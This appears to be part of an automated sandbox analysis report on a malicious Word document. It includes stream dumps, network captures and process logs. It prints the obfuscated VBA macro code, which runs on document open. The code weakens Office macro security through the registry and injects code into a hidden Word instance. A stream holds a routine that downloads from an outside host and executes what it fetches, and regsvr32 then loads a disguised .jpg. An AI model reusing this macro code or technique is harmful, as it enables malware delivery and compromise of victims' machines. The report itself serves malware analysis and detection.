                Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 55 73 65 72 46 6f 72 6d 31 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 00 6c 69 73 74 43 6f 70 79 00 6c 00 69 00 73 00 74 00 43 00 6f 00 70 00 79 00 00 00 72 65 66 43 6f 6e 76 65 72 74 43 61 70 74 69 6f 6e 00 72 00 65 00 66 00 43 00 6f 00 6e 00 76 00
                Stream Path: UserForm1/\x1CompObj, File Type: data, Stream Size: 97
                General
                Stream Path:UserForm1/\x1CompObj
                File Type:data
                Stream Size:97
                Entropy:3.61064918306
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 292
                General
                Stream Path:UserForm1/\x3VBFrame
                File Type:ASCII text, with CRLF line terminators
                Stream Size:292
                Entropy:4.58743694765
                Base64 Encoded:True
                Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                Stream Path: UserForm1/f, File Type: data, Stream Size: 90
                General
                Stream Path:UserForm1/f
                File Type:data
                Stream Size:90
                Entropy:2.89102698747
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . , . . . . . h o . . $ . . . . . . . . . . . . . X . . . . . . . T e x t B o x 1 4 . . . . . . .
                Data Raw:00 04 20 00 08 0c 00 0c 01 00 00 00 01 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 2c 00 00 00 00 01 68 6f 00 00 24 00 e5 01 00 00 08 00 00 80 01 00 00 00 58 03 00 00 00 00 17 00 54 65 78 74 42 6f 78 31 34 02 00 00 1a 01 00 00
                Stream Path: UserForm1/o, File Type: data, Stream Size: 856
                General
                Stream Path:UserForm1/o
                File Type:data
                Stream Size:856
                Entropy:5.78040237389
                Base64 Encoded:True
                Data ASCII:. . 8 . . . @ . . . . . . H . . . . . . . . . . { . . . S u b a u t o c l o s e ( ) . . d o w n l o a d . . e x e c u t e . . E n d S u b . . . . S u b d o w n l o a d ( ) . . . . S e t x m l h t t p = C r e a t e O b j e c t ( " m i c r o s o f t . x m l h t t p " ) . . x m l h t t p . O p e n " G E T " , " h t t p : / / b e t t e r - t r a n s p o r t - 2 0 0 8 . c o m / b i j o l / d V 6 T 3 i G 7 z Y Y N / G d U b 2 h c o K h 0 i 1 6 j t B 3 A 2 H 0 N A 1 h p c / 7 4 6 8
                Data Raw:00 02 38 03 01 01 40 80 00 00 00 00 1b 48 80 ac 1d 03 00 80 ec 09 00 00 7b 02 00 00 53 75 62 20 61 75 74 6f 63 6c 6f 73 65 28 29 0d 0a 20 20 20 20 64 6f 77 6e 6c 6f 61 64 0d 0a 20 20 20 20 65 78 65 63 75 74 65 0d 0a 45 6e 64 20 53 75 62 0d 0a 0d 0a 53 75 62 20 64 6f 77 6e 6c 6f 61 64 28 29 0d 0a 0d 0a 53 65 74 20 78 6d 6c 68 74 74 70 20 3d 20 43 72 65 61 74 65 4f 62 6a 65 63 74 28
                Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4855
                General
                Stream Path:VBA/_VBA_PROJECT
                File Type:data
                Stream Size:4855
                Entropy:4.66602075705
                Base64 Encoded:False
                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
                Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 07 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2486
                General
                Stream Path:VBA/__SRP_0
                File Type:data
                Stream Size:2486
                Entropy:3.64532699898
                Base64 Encoded:True
                Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ N . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . W
                Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00
                Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 214
                General
                Stream Path:VBA/__SRP_1
                File Type:data
                Stream Size:214
                Entropy:1.76333029747
                Base64 Encoded:False
                Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 348
                General
                Stream Path:VBA/__SRP_2
                File Type:data
                Stream Size:348
                Entropy:1.78667786328
                Base64 Encoded:False
                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 d1 0b 00 00 00 00 00 00 00 00 00 00 11 0c 00 00 00 00 00 00 00 00 00 00 41 0c
                Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 106
                General
                Stream Path:VBA/__SRP_3
                File Type:data
                Stream Size:106
                Entropy:1.35911194617
                Base64 Encoded:False
                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . b . . . . . . . . . . . . . . .
                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 00 00 00 00 00 00 62 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00
                Stream Path: VBA/dir, File Type: Tower/XP rel 3 object not stripped - version 18435, Stream Size: 1172
                General
                Stream Path:VBA/dir
                File Type:Tower/XP rel 3 object not stripped - version 18435
                Stream Size:1172
                Entropy:6.62532484228
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . | b . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . . . m . .
                Data Raw:01 90 b4 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 06 bb 7c 62 0f 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

                Network Behavior

                Network Port Distribution

                TCP Packets

                Timestamp                             Source Port  Dest Port  Source IP       Dest IP
                Apr 28, 2021 17:47:31.154751062 CEST  49165        80         192.168.2.22    45.142.215.160
                Apr 28, 2021 17:47:31.224575996 CEST  80           49165      45.142.215.160  192.168.2.22
                Apr 28, 2021 17:47:31.224666119 CEST  49165        80         192.168.2.22    45.142.215.160
                Apr 28, 2021 17:47:31.225944996 CEST  49165        80         192.168.2.22    45.142.215.160
                Apr 28, 2021 17:47:31.294394016 CEST  80           49165      45.142.215.160  192.168.2.22
                Apr 28, 2021 17:47:31.546538115 CEST  80           49165      45.142.215.160  192.168.2.22
                Apr 28, 2021 17:47:31.546854973 CEST  49165        80         192.168.2.22    45.142.215.160
                Apr 28, 2021 17:47:32.014336109 CEST  49165        80         192.168.2.22    45.142.215.160

                UDP Packets

                Timestamp                             Source Port  Dest Port  Source IP     Dest IP
                Apr 28, 2021 17:47:31.060580969 CEST  52197        53         192.168.2.22  8.8.8.8
                Apr 28, 2021 17:47:31.131036043 CEST  53           52197      8.8.8.8       192.168.2.22

                DNS Queries

                Timestamp                             Source IP     Dest IP  Trans ID  OP Code             Name                       Type            Class
                Apr 28, 2021 17:47:31.060580969 CEST  192.168.2.22  8.8.8.8  0x2c09    Standard query (0)  better-transport-2008.com  A (IP address)  IN (0x0001)

                DNS Answers

                Timestamp                             Source IP  Dest IP       Trans ID  Reply Code    Name                       CName  Address         Type            Class
                Apr 28, 2021 17:47:31.131036043 CEST  8.8.8.8    192.168.2.22  0x2c09    No error (0)  better-transport-2008.com  -      45.142.215.160  A (IP address)  IN (0x0001)

                HTTP Request Dependency Graph

                • better-transport-2008.com

                HTTP Packets

                Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                0           192.168.2.22  49165        45.142.215.160  80                C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                Timestamp                             kBytes transferred  Direction  Data
                Apr 28, 2021 17:47:31.225944996 CEST  0                   OUT        GET /bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: better-transport-2008.com
                Connection: Keep-Alive
                Apr 28, 2021 17:47:31.546538115 CEST  1                   IN         HTTP/1.1 200 OK
                Date: Wed, 28 Apr 2021 15:47:31 GMT
                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
                X-Powered-By: PHP/7.2.34
                Content-Length: 204
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 6c 61 6b 61 34 22 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL "laka4" was not found on this server.</p></body></html>


                Code Manipulations

                Statistics

                CPU Usage


                Memory Usage

                Click to jump to process

                High Level Behavior Distribution


                Behavior


                System Behavior

                General

                Start time:17:47:30
                Start date:28/04/2021
                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                Imagebase:0x13f5b0000
                File size:1424032 bytes
                MD5 hash:95C38D04597050285A18F66039EDB456
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time: 17:47:34
                Start date: 28/04/2021
                Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                Wow64 process (32bit): false
                Commandline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                Imagebase: 0x13f5b0000
                File size: 1424032 bytes
                MD5 hash: 95C38D04597050285A18F66039EDB456
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Reputation: high

                General

                Start time: 17:47:35
                Start date: 28/04/2021
                Path: C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit): false
                Commandline: regsvr32 c:\programdata\argumentSelectTmp.jpg
                Imagebase: 0xff250000
                File size: 19456 bytes
                MD5 hash: 59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Reputation: high

                Disassembly

                Code Analysis

                Call Graph

                [Call graph rendered as an image in the report; edges recovered from the graph data:]
                autoopen -> memoryIndex (Quit:1, CreateObject:1), viewValueTextbox (CreateObject:1), convertIndex
                viewValueTextbox -> ptrPtrStorage (CreateObject:1) x 2, exceptionPointer x 2, captionBufData (Version:1, Application:1), mainExLocal, listboxNextVar, varClass
                textExButton (Val:1, Len:1, Mid$:1) has no incoming edge (not executed)

                Module: ThisDocument

                Declaration
                Line  Content
                1     Attribute VB_Name = "ThisDocument"
                2     Attribute VB_Base = "1Normal.ThisDocument"
                3     Attribute VB_GlobalNameSpace = False
                4     Attribute VB_Creatable = False
                5     Attribute VB_PredeclaredId = True
                6     Attribute VB_Exposed = True
                7     Attribute VB_TemplateDerived = True
                8     Attribute VB_Customizable = True

                Module: UserForm1

                Declaration
                Line  Content
                1     Attribute VB_Name = "UserForm1"
                2     Attribute VB_Base = "0{C70C972A-9359-4393-8302-539D2FF78F23}{25405C50-5AD6-4D56-82F4-D7B1075E12BD}"
                3     Attribute VB_GlobalNameSpace = False
                4     Attribute VB_Creatable = False
                5     Attribute VB_PredeclaredId = True
                6     Attribute VB_Exposed = False
                7     Attribute VB_TemplateDerived = False
                8     Attribute VB_Customizable = False

                Module: listCopy

                Declaration
                Line  Content
                1     Attribute VB_Name = "listCopy"

                Executed Functions
                APIs  |  Meta Information
                Part of subcall function viewValueTextbox@repoText: vbUnicode
                Part of subcall function viewValueTextbox@repoText: vbUnicode
                Part of subcall function memoryIndex@optionRemoveGeneric: CreateObject
                Part of subcall function memoryIndex@optionRemoveGeneric: Documents
                Part of subcall function memoryIndex@optionRemoveGeneric: AddFromString
                Part of subcall function memoryIndex@optionRemoveGeneric: Visible
                Part of subcall function memoryIndex@optionRemoveGeneric: Quit
                Part of subcall function memoryIndex@optionRemoveGeneric: wdDoNotSaveChanges

                Line  Instruction  |  Meta Information
                2     Sub autoopen()
                3     viewValueTextbox  |  executed
                4     Dim clearIteratorRef as String
                5     clearIteratorRef = convertIndex
                6     memoryIndex clearIteratorRef
                7     End Sub

                Module: optionRemoveGeneric

                Declaration
                Line  Content
                1     Attribute VB_Name = "optionRemoveGeneric"

                Executed Functions
                APIs  |  Meta Information
                CreateObject  |  CreateObject("word.application") -> Microsoft Word
                Documents
                AddFromString
                Visible
                Quit
                wdDoNotSaveChanges

                Strings  |  Decrypted Strings
                "word.application"
                "ThisDocument"

                Line  Instruction  |  Meta Information
                2     Sub memoryIndex(memoryTempTrust as String)
                3     Set optionPtr = CreateObject("word.application")  |  CreateObject("word.application") -> Microsoft Word; executed
                4     Set collectionSelect = optionPtr.Documents.Add  |  Documents
                5     collectionSelect.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString memoryTempTrust  |  AddFromString
                6     optionPtr.Visible = False  |  Visible
                7     optionPtr.Quit SaveChanges := wdDoNotSaveChanges  |  Quit, wdDoNotSaveChanges
                8     End Sub

                Module: refConvertCaption

                Declaration
                Line  Content
                1     Attribute VB_Name = "refConvertCaption"

                Executed Functions
                APIs  |  Meta Information
                CreateObject  |  CreateObject("msxml2.domdocument")
                createElement
                DataType
                Text
                nodeTypedValue

                Strings  |  Decrypted Strings
                "msxml2.domdocument"
                "code"
                "bin.base64"

                Line  Instruction  |  Meta Information
                2     Function ptrPtrStorage(constCollectionDatabase as String) as Variant
                3     Dim vbSwap as Object  |  executed
                4     Dim memCaptionOption as Object
                5     Set vbSwap = CreateObject("msxml2.domdocument")  |  CreateObject("msxml2.domdocument"); executed
                6     Set memCaptionOption = vbSwap.createElement("code")  |  createElement
                7     memCaptionOption.DataType = "bin.base64"  |  DataType
                8     memCaptionOption.Text = constCollectionDatabase  |  Text
                9     ptrPtrStorage = memCaptionOption.nodeTypedValue  |  nodeTypedValue
                10    End Function

                APIs  |  Meta Information
                StrConv

                Line  Instruction  |  Meta Information
                11    Function exceptionPointer(captionPaste, memConvertStruct)
                12    exceptionPointer = StrConv(captionPaste, memConvertStruct)  |  StrConv; executed
                13    End Function

                Module: repoText

                Declaration
                Line  Content
                1     Attribute VB_Name = "repoText"

                Executed Functions
                APIs  |  Meta Information
                Part of subcall function exceptionPointer@refConvertCaption: StrConv
                Part of subcall function ptrPtrStorage@refConvertCaption: CreateObject
                Part of subcall function ptrPtrStorage@refConvertCaption: createElement
                Part of subcall function ptrPtrStorage@refConvertCaption: DataType
                Part of subcall function ptrPtrStorage@refConvertCaption: Text
                Part of subcall function ptrPtrStorage@refConvertCaption: nodeTypedValue
                vbUnicode
                Part of subcall function captionBufData@repoText: Version
                Part of subcall function captionBufData@repoText: Application
                Part of subcall function exceptionPointer@refConvertCaption: StrConv
                Part of subcall function ptrPtrStorage@refConvertCaption: CreateObject
                Part of subcall function ptrPtrStorage@refConvertCaption: createElement
                Part of subcall function ptrPtrStorage@refConvertCaption: DataType
                Part of subcall function ptrPtrStorage@refConvertCaption: Text
                Part of subcall function ptrPtrStorage@refConvertCaption: nodeTypedValue
                vbUnicode

                Strings  |  Decrypted Strings
                "SEtFWV9DVVJSR"
                "XFdvcmRcU2"
                "REG_DWORD"

                Line  Instruction  |  Meta Information
                14    Sub viewValueTextbox()
                15    clearReference = exceptionPointer(ptrPtrStorage("SEtFWV9DVVJSR" & mainExLocal & "cm9zb2Z0XE9mZmljZVw="), vbUnicode)  |  vbUnicode; executed
                16    countSelect = captionBufData
                17    globalResponse = exceptionPointer(ptrPtrStorage("XFdvcmRcU2" & varClass & "jZXNzVkJPTQ=="), vbUnicode)  |  vbUnicode
                18    clearRefLoad = clearReference & countSelect & globalResponse
                19    With CreateObject("ws" & listboxNextVar & "ell")
                20    . RegWrite clearRefLoad, 1, "REG_DWORD"
                21    End With
                22    End Sub

                APIs  |  Meta Information
                Version
                Application

                Line  Instruction  |  Meta Information
                2     Function captionBufData() as String
                3     captionBufData = Application.Version  |  Version, Application; executed
                4     End Function

                Strings  |  Decrypted Strings
                "U5UX1VTRVJcU29mdHdhcmVcTWlj"

                Line  Instruction  |  Meta Information
                5     Function mainExLocal()
                6     mainExLocal = "U5UX1VTRVJcU29mdHdhcmVcTWlj"  |  executed
                7     End Function

                Strings  |  Decrypted Strings
                "cript.sh"

                Line  Instruction  |  Meta Information
                8     Function listboxNextVar()
                9     listboxNextVar = "cript.sh"  |  executed
                10    End Function

                Strings  |  Decrypted Strings
                "VjdXJpdHlcQWN"

                Line  Instruction  |  Meta Information
                11    Function varClass()
                12    varClass = "VjdXJpdHlcQWN"  |  executed
                13    End Function

                Line  Instruction  |  Meta Information
                30    Function convertIndex()
                31    convertIndex = UserForm1.TextBox1  |  executed
                32    End Function

                Non-Executed Functions
                APIs  |  Meta Information
                Len
                Chr$
                Val
                Mid$

                Strings  |  Decrypted Strings
                "&H"
                "&H"

                Line  Instruction  |  Meta Information
                23    Public Function textExButton(ByVal tempClearIndex as String) as String
                24    For arrayOption = 1 To Len(tempClearIndex) Step 2  |  Len
                25    titleSize = Chr$(Val("&H" & Mid$(tempClearIndex, arrayOption, 2)))  |  Chr$, Val, Mid$
                26    trustStruct = trustStruct & titleSize
                27    Next arrayOption  |  Len
                28    textExButton = trustStruct
                29    End Function
